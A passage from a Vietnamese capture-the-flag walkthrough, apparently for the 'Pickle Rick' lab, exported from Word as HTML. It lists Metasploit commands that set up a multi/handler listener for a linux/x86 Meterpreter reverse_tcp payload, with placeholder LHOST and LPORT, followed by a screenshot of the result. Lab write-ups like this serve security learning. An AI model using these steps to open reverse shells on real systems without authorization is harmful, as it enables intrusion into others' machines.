exploit/multi/handler<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
|
||
LHOST <IP của bạn><o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
|
||
LPORT <Port đã dùng trong command msfvenom bên trên><o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>set
|
||
PAYLOAD linux/x86/meterpreter/reverse_tcp<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>exploit<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết
|
||
quả cuối cùng nhận được sẽ là<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_33" o:spid="_x0000_i1025"
|
||
type="#_x0000_t75" alt="Graphical user interface, text Description automatically generated"
|
||
style='width:468.6pt;height:84pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image056.png" o:title="Graphical user interface, text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=625 height=112
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image057.png"
|
||
alt="Graphical user interface, text Description automatically generated"
|
||
v:shapes="Picture_x0020_33"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
</div>
|
||
|
||
</body>
|
||
|
||
</html>
|